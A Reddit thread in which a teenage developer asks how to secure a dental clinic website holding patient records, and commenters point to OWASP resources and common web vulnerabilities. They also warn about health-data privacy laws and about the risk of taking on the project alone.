How to make my website secure?
Posted by Far_Contact1146@reddit | learnprogramming | View on Reddit | 29 comments
I'm making a dental clinic website for my client how would I prevent data from being leaked or stolen by hackers basically? Would encryption, running it on railway, and whitelisting ip adresses be enough? any other possible way?
_malaikatmaut_@reddit
Please tell us which clinic that is so we can avoid having our data stolen.
Far_Contact1146@reddit (OP)
ahahahaha mbb but any tips?
HealyUnit@reddit
You seriously seem to be stupid enough to think we're joking. We're not. For once, please, listen to people with experience. This isn't AHAHAA MY BAD LOL JK. This is people's medical information we're talking about. You will get sued if not in more legal trouble when you inadvertently leak information.
But hey, I'm sure laughing to the judge and going "HAHA GUYS WOOPS" is really gonna make everything okay, right?
Far_Contact1146@reddit (OP)
okay okay mb
NoSteak1123@reddit
That’s a huge step up! Moving from resorts to medical/dental is definitely where the security details start to matter a ton more. Encryption and whitelisting are great starts, but I actually switched over to Osto for my own sites and it’s been superb. It takes a lot of the manual 'worry' out of the process and feels way more robust for sensitive data. Good luck with the build, your client is lucky to have someone taking this so seriously!
HealyUnit@reddit
I'm sorry, have you read the rest of this guy's replies? Taking this seriously is not even in the same universe.
Far_Contact1146@reddit (OP)
alsoo can i ask what does Otso do? and the pricing?
Far_Contact1146@reddit (OP)
TYY SM
VibrantGypsyDildo@reddit
Too wide topic, just read books on fundamentals. I wonder if they are covered in the FAQ section.
If you don't read FAQ, please be aware of SQL injection. Or basic authentication. Or randomizing user IDs, or not using birth years as a password by default.
By a simple script back in the days I saw who had problems with prostate (generally considered a private thing) in one particular clinic.
Please don't be the next dev who exposes data like this.
Far_Contact1146@reddit (OP)
dw im making sure of everything
nomoreplsthx@reddit
Where are you located, and are you storing personal info, health info, or payment data.
There are serious legal implications to messing this up in many jurisdictions. Like 'life ruining' legal implications.
The moment you start collecting personal information, your become legally liable if it is stolen. The legal system doesn't take 'I'm 16 go easy' as an excuse generally.
Far_Contact1146@reddit (OP)
I'm located in the Philippines and I'm storing general information like name address and dental records and the dental Charting
teraflop@reddit
Sorry to be blunt, but if you're asking such a broad question, I suspect you're not yet knowledgeable enough to be able to responsibly do a project like this.
Encryption of data in transit (i.e. HTTPS) is absolutely critical, but it is not enough to make your site secure, because there are all kinds of ways a hacker can get data besides just intercepting it on the wire.
This is a good defense-in-depth measure, if you can deal with the usability tradeoff of having to manage the whitelist. It's not perfect and you shouldn't rely on it. In particular, it does very little to stop targeted XSS or CSRF attacks.
Using a trustworthy hosting provider is necessary, but again, far from sufficient. I don't have any particular opinion about Railway in general.
You've basically only talked about the security of your network and hosting infrastructure, but not the security of the software you're creating, which is a huge potential source of vulnerabilities. Take a look at the OWASP Top Ten and the more detailed list of attacks for a sampling of the kinds of things that can go wrong. You must be very diligent and careful to avoid all of these vulnerabilities if you want your system to be secure.
And bear in mind that to some extent, security depends on users. No matter how securely you make your webapp, it won't help if your users have keyloggers installed on their machines, or if they get tricked into typing their passwords into a phishing page.
Also, bear in mind that healthcare is often covered by regulations. For instance, in the United States, healthcare organizations (including their software) are covered by HIPAA which includes security and privacy rules. It's not enough to just say that your software is secure. You also need to have documented processes and technical security infrastructure to detect security breaches if they happen, so that you can comply with your legal obligation to notify the affected users.
dylantrain2014@reddit
Please provide some more information on the website. Does this site have a backend? Is sensitive or HIPAA protected information going to be accessed or stored?
Does the dental clinic have any existing data? Are you the only developer on this project?
Far_Contact1146@reddit (OP)
yes im the only dev on this project and go easy on me im 16 hehe it does have a backend
dylantrain2014@reddit
What type of information is being stored in the backend?
Far_Contact1146@reddit (OP)
basic information like name age address dental records and the dental chart
dkopgerpgdolfg@reddit
Then, for most jurisdictions, a sane 16-year self-taught programmer will stop right there, to avoid being in deep sh*
dylantrain2014@reddit
What country does the clinic reside in and/or will the site be hosted in?
Far_Contact1146@reddit (OP)
Philippines bro
dylantrain2014@reddit
In that case, all comments about HIPAA can be ignored. That said, the Philippines has its own set of laws surrounding sensitive healthcare information. Realistically speaking, to implement any kind of electronic storage for healthcare records is going to require a team of more than one person.
At minimum, you need 2 people for this kind of thing: someone to write the code (you!) and someone to handle the security and compliance elements of the project. Legally, you also need a Data Protection Officer.
This project would also need longterm support. No healthcare information system can go without active monitoring and maintenance. You could technically pass off that maintenance work to someone else, but it’s not really practical to do so.
Hosting this locally does not change anything besides a bit less paperwork with respect to cloud providers.
The actual security features aren’t anything special (they coincide with good practice for any operational Internet facing application), but they’re significant enough that you’d need someone whose only job is implementing and validating them.
Far_Contact1146@reddit (OP)
would it be possible to do it as 1 person? my clients aren't big clinics either and I'm not aiming for them it's just for small dental clinics but what would I need to execute this on my own cuz I don't have the money to get more people or someone to do maintenance
dylantrain2014@reddit
Assuming you didn’t care about the legal aspect, I think it’d be possible from a technical standpoint. You can lookup what data and security requirements exist. They’re described in great detail.
You definitely won’t have a particular robust system, nor one that can realistically be considered secure. If the clinic has enough patients that they need this kind of software, they should really just look for an existing vendor who can take legal responsibility.
HealyUnit@reddit
Sorry, but no. Not because I wanna be an ass, but because this is security we're talking about. This isn't a "Ah, well OP tried! Woops!" kinda deal. You're dealing with personal identifiable information (PII) and maybe personal health information (PHI).
There are some very serious laws covering these - the Health Insurance Portability and Accountability Act (HIPAA), state "breach" laws that basically require the maintainer of said information to notify any affected party if their information is leaked for any reason, and others - that mean you do not mess around with personal information.
If you're not in the US, simply Google "personal information laws".
You should be scared.
Far_Contact1146@reddit (OP)
okay okayy mbmb
Any-Range9932@reddit
HIPPA compliance would make this extreme hard unless dental want to get sued if data get leaked. Is this us base
AardvarkIll6079@reddit
You have much bigger things to worry about. There’s a whole lot to be HIPPA compliant. No offense OP, but you’re in way over your head. Do not take this job. You’re asking for legal trouble
Far_Contact1146@reddit (OP)
gah daym what if i made things run locally?
oblong_pickle@reddit
This is huge question and you haven't provided anywhere near enough details.
OWASP has some good info to get started, but its very dense (there is a lot of it)
https://owasp.org/Top10/2025/
https://github.com/OWASP/CheatSheetSeries